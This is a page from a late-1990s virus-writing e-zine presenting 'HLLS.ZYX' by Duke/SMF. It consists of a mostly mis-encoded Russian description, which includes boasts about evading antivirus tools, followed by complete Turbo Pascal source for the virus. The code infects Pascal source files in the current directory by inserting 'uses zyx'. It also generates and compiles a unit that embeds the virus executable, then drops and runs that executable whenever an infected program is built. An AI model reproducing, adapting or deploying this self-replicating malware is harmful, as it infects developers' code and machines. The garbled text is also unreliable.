- [Duke's Virus Labs #4] - [Page 04] -

HLLS.ZYX
(c) by Duke/SMF

     : HLLS.ZYX
         : Duke/SMF
 ண.   : Turbo Pascal 7.0
 ᮧ : 9.01.99


   쪮 ⥫  ॠ ᨬ  ᪠.  ᥬ
  ⥩  ॠ樨.  ᪠   ᨫ쭮 饭.
  ⪠  ⭥:
1) 稥  ᮧ EXE-䠩 Relocation Table.   ஢
   ⨫... =(8-E~~ -  ExeHeader   뢠 "祭
   묨".   ࠨ  ⠡ ᮡ   .
2) ਬ窠   ࠧ஬ 1.5  (- 㭪 1  ࠨ ;))
3)  ᫥⢨  ।饣 㭪, 让 ࠧ 祭 ணࠬ.
    ⨬ ⥫⢮ 室 ᬨ -    ࠢ 
   .

    ୥  ᨬ.   ⨥ ࠧ㬥,  ⢠  
९⥭ ⮫쪮,   祭 ᫮ () ࠧ 
 ࠡᯮᮡ .  ⮬     ,
  ᠬ.

   室   ᮮࠦ  ﯠ 쪠    (᫮)
HLLS.ZYX. ᪮  ᠫ   100% ᪠,  稫 ᪮쪮
.   ⮬,     EXE-䠩,  ࠦ PAS-䠩.
ࠦ 砥  ⮬,   PAS-䠩 뢠 祭 
 ZYX, ᮤঠ饣 .

    ࠡ  :
   1) 饭   ᮧ  ᪥ 䠩 zyx.pas,  
ଠ pascal-.  ࠧ imlementation ᮤন ⢥
楤 Starting.  ᯮ   ᮤন 맮 楤
Starting.    ZYX 砥  䠩 ᠬ ,  ࢮ
ࠢ 砥 楤 Starting.
   2) ᫨    PATH   몠 Turbo Pascal
(tpc.exe  bpc.exe),  䠩 ZYX.PAS   ZYX.TPU (᫨
஢ ,  ,     襬 饬 ;)))
   3) ஢   ࠦ PAS-䠩 ⥪饣 ⠫.  ,
㥬 ࠦ 䠩  EXE.
   4)  ᪠ ࠦ 䠩,  楤 Starting ᮧ
 ᪥ 䠩   ᮬ, ᪠ ,  ⥬ 㤠. 
   㭪 1 -  .

    ࠧ,  ᢮ ⢮   室  3 ﭨ:

    ________________      ___________________      ____________________
   |                |    |   ᮧ |    |                    |
   |    |===>|  TPU-䠩   (2)  |===>|   ࠦ |
   | EXE-䠩  (1) |    |___________________|    |   EXE-䠩 (3)    |
   |________________|<============================|____________________|


    ⥯  ᨫ ⨢ᮢ :))  HLLS.ZYX   EXE-䠩,
⮬ १  & SHERIFF   ᫥.  ᪥ 
⮫쪮 PAS-䠩 -  ⮦ .    -  ࠡ  ⮫쪮 
⥪⮢묨 䠩.

   ணࠬ ⨯ ADinf Cure Module ⮦    .  
⮫쪮,   㦥 㣠 ணࠬ! ⠭ 䠩  ࢮ
ﭨ   ࠢ  㤠... ࠨ Relocation' -   
誨 ᪠ !

   ⮭宦   䠩  ࠧ  䠩  䠩 - 
  ⮣,     몠. (   ᯫ뢠  ⮪
. ᪮ -   ᠭ ⠭  ணࠬ  ᪠
࠭祭 ᫮ 64,     䠩,  
" 㬥"  ⥫.  䠩 ᫥ ࠦ  ⠭
஢.)  ࠧ  ﭭ   ⢥,   祭
᫮. ⨢ᠬ ਤ ᪠ ᨣ  ᥬ 䠩.

   ⮨ ,  ⥫   (  㦭!)  
஢ - ⨫⮩ (PKLITE, CRYPT  祥).  ⮬ 砥
 ᨣ ( ࠢ   ᮬ),  ࠧ
   ⨢ᮢ  ஡  ᪮/祭.   ࠧ
ભ,    HLLS.ZYX -  㦥   (筥
,  ஢訩  ) !   㯠 ⥫    
 : ⥫  㬥   =>   ६ 
 ᮧ ᢮ PAS-dropper' =>  த⢨   
ࠡ 㤥  ⭠.

     -, 쬠 न୮. 設⢮ HLL-ᮢ  ᢮
ࠡᯮᮡ ᫥ 㯠/஢ ࠦ 䠩 (祧 
६ ⪨  ࠦ,  ࠧ ,   HLLP 
ᮧ ஬ ஡  쭥襬 ࠧ.    HLLS.ZYX
   ᮡ⢥ ࠧ஢ -  । ⮬᪨ :))
⮬ ० (४⨢) 樨  ᨨ  (  TMT
Pascal ;)   묨.   ਤ ࠢ  室 
 ᫥   ⥪ ணࠬ. , ,   
ॡ  ⠫஢: ⪮஢  ᪠  ⭮ ।!

    HLLP-   ।  ᪮. ᫨ ࠡ 
訫 ४⭮ (ਬ,  ᫠  諮  RESET), 
⢠ 뢠 祭!   㡭 ᪠뢠  ᭮
樨 :((   HLLS.ZYX 祣   !!!

      ५ ⮬,    - ᨬ.   ࠢ
⮬ ணࠬ,   㦥த ࠯  ᪮.  祭
 (-,  ⠪ ;) 㤠     ࠦ
䠩:  뢠  ᮧ Relocation Table,    
 ,     ࠧ ⨯஢ ⠭ -   ;))
  AV  ,     - ᯮᮡ ᥣ ...

    ,   ⨢᭨  . HLLP -  -  ...
  । ᮧ ᥬ⢮ HLLS ( ᮧ  HLLW-ᥬ⢮, ⠪
 ஦ 㦥 ७!).

    HLLS.ZYX -  ࢠ 窠  ᥬ⢥ HLLS-ᮢ.  ᫥
 DVL  易⥫쭮   ⮩ ⥬.    
ᯥ䥪⠬,  騬  묨.  ᫮,  -
㢨.  ,   ᯥ客  ᮧ HLLS-.  
ࠧ, ᯮ !

PS :  ⠪  (  ࠡ  ⮩ 쥩) 㧭,  
      (,     ;) RedArc ⠪  ࠡ⠥ 
     ⮬ ࠢ (祬 ᯥ譮). ⮬,  ,
     ।  ਢ   ᯥ客 ! ,     
     騥 ஥ :)

===== Cut here =====
{$M 10000, 2000, 10000}
{$I-,S-}
program HLLS_ZYX;
uses dos;
var Command,Compile:string;
    Comp:boolean;
    Len:integer;
    s:searchrec;
{--------------------------------------------------------------------------}
function UpStr(st:string):string;   {८ࠧ ப  孥 ॣ}
var n:string;
    i:integer;
begin
n:='';
for i:=1 to length(st) do n:=n+UpCase(st[i]);
UpStr:=n;
end;
{--------------------------------------------------------------------------}
function Find(name,what:string):boolean;{ ᮢ᪮  FIND}
{  ᨬ  ⢨ ⨫ FIND  ᪥}
var f:text;
    st:string;
begin
Find:=false;
assign(f,name);reset(f);
while not eof(f) do
  begin
  readln(f,st);
  if pos(what,UpStr(st))<>0 then
    begin
    Find:=true;
    exit
    end
  end
end;
{--------------------------------------------------------------------------}
procedure Infect(st:string);        {ࠦ 䠩}
const sn='$$$$$$$$';
var f,g:text;
    u,ip,w:byte;
    s:string;
    n:byte;
begin
u:=0;
ip:=0;
w:=0; { ࠧ}
if Find(st,'ZYX') then exit;   {䠩 㦥 ࠦ}
if Find(st,'USES') then u:=1 ;
if Find(st,'PROGRAM') or Find(st,'IMPLEMENTATION') then ip:=1 ;
exec(Command,'/c copy '+st+' '+sn+'>nul');
assign(f,sn);reset(f);                           {뫨 ६ 䠩}
assign(g,st);rewrite(g);                         {१ᠫ }
if (ip=0) and (u=0) then
  begin
  writeln(g,'uses zyx;');
  w:=1;
  end;
while not eof(f) do
  begin
  readln(f,s);
  if w=1 then writeln(g,s) else
    begin
    if u=1
    then if pos('USES',UpStr(s))<>0
         then begin
              n:=pos('USES',UpStr(s))+4;
              write(g,copy(s,1,n));
              write(g,'zyx,');
              writeln(g,copy(s,n,length(s)-n+1));
              w:=1;
              end
         else writeln(g,s)
    else if (pos('PROGRAM',UpStr(s))<>0) or (pos('IMPLEMENTATION',UpStr(s))<>0)
         then begin
              writeln(g,s);
              writeln(g,'uses zyx;');
              w:=1;
              end
         else writeln(g,s)
    end;
  end;
close(g);
close(f);erase(f);
if Comp=true then exec(Command,'/c '+Compile+' '+st+'>nul');
end;
{--------------------------------------------------------------------------}
procedure MakeDB;  {ᮧ TPU-dropper }
var f:text;
    i,c:byte;
    d:file;  {室 䠩}
    z:byte;  {稪 ᠭ ᨬ}
begin
findfirst(paramstr(0),$20,s);
Len:=s.size;                   {諨 }
assign(f,'zyx.pas');rewrite(f);
writeln(f,'{$M 10000, 1000, 10000}');
writeln(f,'unit zyx;');
writeln(f,'interface');
writeln(f,'uses dos;');
writeln(f,'implementation');
writeln(f,'procedure Starting;');
writeln(f,'const dat:array[1..',Len,'] of byte=(');
assign(d,paramstr(0));reset(d,1);
z:=0;
while not eof(d) do
  begin
  blockread(d,c,1);
  write(f,ord(c));
  if not eof(d) then write(f,',');
  z:=z+1;
  if z=20 then begin writeln(f,'');z:=0;end;
  end;
writeln(f,');');
writeln(f,'var g:file;');
writeln(f,'begin');
writeln(f,'assign(g,''zyx.exe'');rewrite(g,1);');
writeln(f,'blockwrite(g,dat,',Len,');');
writeln(f,'close(g);');
writeln(f,'exec(''zyx.exe'','''');');
writeln(f,'erase(g)');
writeln(f,'end;');
writeln(f,'begin');
writeln(f,'Starting;');
writeln(f,'end.');
close(f);
if Comp=true then
  begin
  exec(Command,'/c '+Compile+' zyx.pas>nul');
  erase(f);   {⠥ ᫥}
  end;
end;
{-------------------------------------------------------------------------}
procedure DetectComp;{। 稥   ஢}
begin
Comp:=false;
Compile:='tpc.exe';
exec(Command,'/c '+Compile+'>nul');
if doserror<>0 then
  begin
  Compile:='bpc.exe';
  exec(Command,'/c '+Compile+'>nul');
  if doserror=0 then Comp:=true;
  end
else Comp:=true;
end;
{--------------------------------------------------------------------------}
begin
findfirst('*.pas',$20,s);                 {饬 PAS-䠩}
if doserror=0 then                        { , 祣 ࠧ !}
  begin
  Command:='[HLLS.ZYX (c) by Duke/SMF]';  { ࠩ⮢ ;) }
  Command:=GetEnv('COMSPEC');             {।塞   COMMAND.COM}
  DetectComp;                             {饬 }
  MakeDB;                                 {ᮧ ZYX.TPU}
  end;
while doserror=0 do
  begin
  Infect(s.name);                         {ࠦ  䠩}
  findnext(s);
  end;
end.
===== Cut here =====
